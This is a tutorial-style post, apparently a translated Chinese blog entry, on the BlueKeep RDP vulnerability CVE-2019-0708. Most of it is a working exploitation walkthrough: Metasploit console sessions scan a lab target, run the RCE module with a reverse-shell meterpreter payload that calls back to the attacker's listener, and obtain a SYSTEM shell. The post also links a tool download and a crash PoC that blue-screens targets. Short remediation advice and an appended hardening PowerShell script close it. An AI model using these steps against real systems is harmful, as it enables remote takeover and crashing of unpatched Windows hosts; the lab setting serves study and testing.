CVE-2019-0708 vulnerability detection and exploitation
Vulnerability details
On 15 May 2019 a critical vulnerability in the Windows server family was disclosed. It affects a wide range of systems and is exploited remotely through the Remote Desktop port, TCP 3389, over the RDP protocol. It is the most severe vulnerability of the year so far, comparable to the earlier ransomware and EternalBlue outbreaks.
Affected versions
- Windows 7 for 32-bit Systems Service Pack 1
- Windows 7 for x64-based Systems Service Pack 1
- Windows Server 2008 for 32-bit Systems Service Pack 2
- Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
- Windows Server 2008 for Itanium-Based Systems Service Pack 2
- Windows Server 2008 for x64-based Systems Service Pack 2
- Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
- Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
- Windows Server 2008 R2 for x64-based Systems Service Pack 1
- Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
- Windows XP SP3 x86
- Windows XP Professional x64 Edition SP2
- Windows XP Embedded SP3 x86
- Windows Server 2003 SP2 x86
- Windows Server 2003 x64 Edition SP2
- Windows 8, Windows 10 and later versions are not affected by this vulnerability
Tool and script share
Link: https://pan.baidu.com/s/1iGZcW1OxmrYvdJEBdjlSgA?pwd=e3hr
Extraction code: e3hr
Exploit reproduction
1. Lab environment
Attacker (Kali): 192.168.80.128
Target (Windows 7): 192.168.80.129
2. Enable Remote Desktop on Windows 7
Tick "Allow remote connections to this computer".
3. Start msfconsole in Kali and scan the target with the CVE-2019-0708 scanner module.
msf6 > search 0708

Matching Modules
================

   #  Name                                             Disclosure Date  Rank    Check  Description
   -  ----                                             ---------------  ----    -----  -----------
   0  auxiliary/scanner/rdp/cve_2019_0708_bluekeep     2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
   1  exploit/windows/rdp/cve_2019_0708_bluekeep_rce   2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
   2  exploit/windows/browser/clear_quest_cqole        2012-05-19       normal  No     IBM Rational ClearQuest CQOle Remote Code Execution
   3  exploit/windows/browser/tumbleweed_filetransfer  2008-04-07       great   No     Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow

Interact with a module by name or index. For example info 3, use 3 or use exploit/windows/browser/tumbleweed_filetransfer

msf6 > use 0
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts 192.168.80.129
rhosts => 192.168.80.129
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run

[+] 192.168.80.129:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.80.129:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The scan result shows that the target is vulnerable.
4. Get a reverse shell with msf
Prerequisite for the reverse shell: the target and the attacker machine can reach each other over the network.
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > search 0708

Matching Modules
================

   #  Name                                             Disclosure Date  Rank    Check  Description
   -  ----                                             ---------------  ----    -----  -----------
   0  auxiliary/scanner/rdp/cve_2019_0708_bluekeep     2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
   1  exploit/windows/rdp/cve_2019_0708_bluekeep_rce   2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
   2  exploit/windows/browser/clear_quest_cqole        2012-05-19       normal  No     IBM Rational ClearQuest CQOle Remote Code Execution
   3  exploit/windows/browser/tumbleweed_filetransfer  2008-04-07       great   No     Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow

Interact with a module by name or index. For example info 3, use 3 or use exploit/windows/browser/tumbleweed_filetransfer

msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > use 1
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.80.129
rhosts => 192.168.80.129
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lhost 192.168.80.128
lhost => 192.168.80.128
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lport 4444
lport => 4444
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting
   1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
   2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
   4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
   5   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
   6   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
   7   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)
   8   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1
target => 1
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 192.168.80.128:4444
[*] 192.168.80.129:3389 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.80.129:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 192.168.80.129:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.80.129:3389 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.80.129:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.80.129:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[!] 192.168.80.129:3389 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.80.129:3389 - Surfing channels ...
[*] 192.168.80.129:3389 - Lobbing eggs ...
[*] 192.168.80.129:3389 - Forcing the USE of FREE'd object ...
[!] 192.168.80.129:3389 - <---------------- | Leaving Danger Zone | ---------------->
[*] Sending stage (200774 bytes) to 192.168.80.129
[*] Meterpreter session 1 opened (192.168.80.128:4444 -> 192.168.80.129:49159) at 2022-12-12 15:16:09 +0800

meterpreter > shell
Process 2580 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

The target setting has to match the target machine: 0 selects automatic fingerprinting (which does not work well), 1 is a physical machine, 2 is a target running in a VirtualBox VM, 3, 4 and 5 are targets running under VMware 14, 15 and 15.1 respectively (see the target list above), and 6 is a target running under Hyper-V. If the target that matches the machine does not succeed, try the other targets (in short, keep trying).
Note: the exploit against Windows 7 SP1 x64 and Windows Server 2008 R2 x64 is not very stable; against Windows 7 SP1 x64 it can crash the target with a blue screen.
Batch detection script
In a Python environment on Windows:
- Edit 3389_hosts and write the IP addresses to be checked into the file, one per line
- Change to the directory containing the code on the command line and run python3 cve-2019-0708.py
Blue screen
Testing with the vulnerability PoC:
PoC: https://github.com/n1xbyte/CVE-2019-0708
Usage: python3 crashpoc.py <ip address> <system type>
The target has blue-screened.
Remediation
Apply the security patch for the corresponding system promptly.
Close port 3389, or add a firewall policy that restricts access to port 3389.
References
https://cloud.tencent.com/developer/article/2069868
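The two remediation steps above, as an added PowerShell check-and-fix script that is not part of the original post or its tool package. It verifies the patch state and the Remote Desktop setting on the host itself, then either switches Remote Desktop off or restricts TCP/3389 to a management subnet; the subnet 192.168.80.0/24 and the KB placeholder are assumptions to replace with your own values (the real KB number comes from the Microsoft advisory for the OS in question).

```powershell
# Added example (not from the original post): verify and harden one host for CVE-2019-0708.
# Run in an elevated PowerShell on the Windows 7 / Server 2008 R2 host. netsh is used so the
# script also works where the NetSecurity cmdlets (Windows 8 / 2012 and later) are missing.
param(
    [string]$MgmtSubnet = "192.168.80.0/24",            # placeholder: your admin network
    [string[]]$PatchKBs = @("KB<from-MS-advisory>"),   # placeholder: CVE-2019-0708 fix(es) for this OS
    [switch]$DisableRdp                                 # set when the host does not need RDP at all
)

$tsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'

# 1. Patch state: the security update is the only real fix; everything below only limits exposure.
$present = Get-HotFix | Where-Object { $PatchKBs -contains $_.HotFixID }
if ($present) { "[OK]   patch installed: $($present.HotFixID -join ', ')" }
else          { "[WARN] none of $($PatchKBs -join ', ') installed; host is exposed if TCP/3389 is reachable" }

# 2. Is Remote Desktop enabled? fDenyTSConnections = 1 means it is switched off.
$deny = (Get-ItemProperty $tsKey -Name fDenyTSConnections).fDenyTSConnections
if ($deny -eq 1) { "[OK]   Remote Desktop is disabled"; return }

if ($DisableRdp) {
    # Same effect as clearing "Allow remote connections to this computer" in System Properties.
    Set-ItemProperty $tsKey -Name fDenyTSConnections -Value 1
    "[FIX]  Remote Desktop disabled"
    return
}

# 3. RDP stays on: allow TCP/3389 only from the management subnet at the host firewall.
#    Windows Firewall evaluates block rules before allow rules, so do not pair a scoped
#    allow with a "block all 3389" rule (that blocks everything). Rely on the default
#    inbound-block policy, disable the built-in any-source RDP rule and add a scoped one.
#    On a localized Windows the "remote desktop" group name may itself be localized.
netsh advfirewall set allprofiles firewallpolicy blockinbound,allowoutbound | Out-Null
netsh advfirewall firewall set rule group="remote desktop" new enable=no | Out-Null
netsh advfirewall firewall add rule name="RDP 3389 from management subnet only" `
    dir=in action=allow protocol=TCP localport=3389 remoteip=$MgmtSubnet | Out-Null
"[FIX]  TCP/3389 now accepted only from $MgmtSubnet"
```

A perimeter firewall rule in front of the host is still needed; this script only covers the host firewall and the Remote Desktop switch.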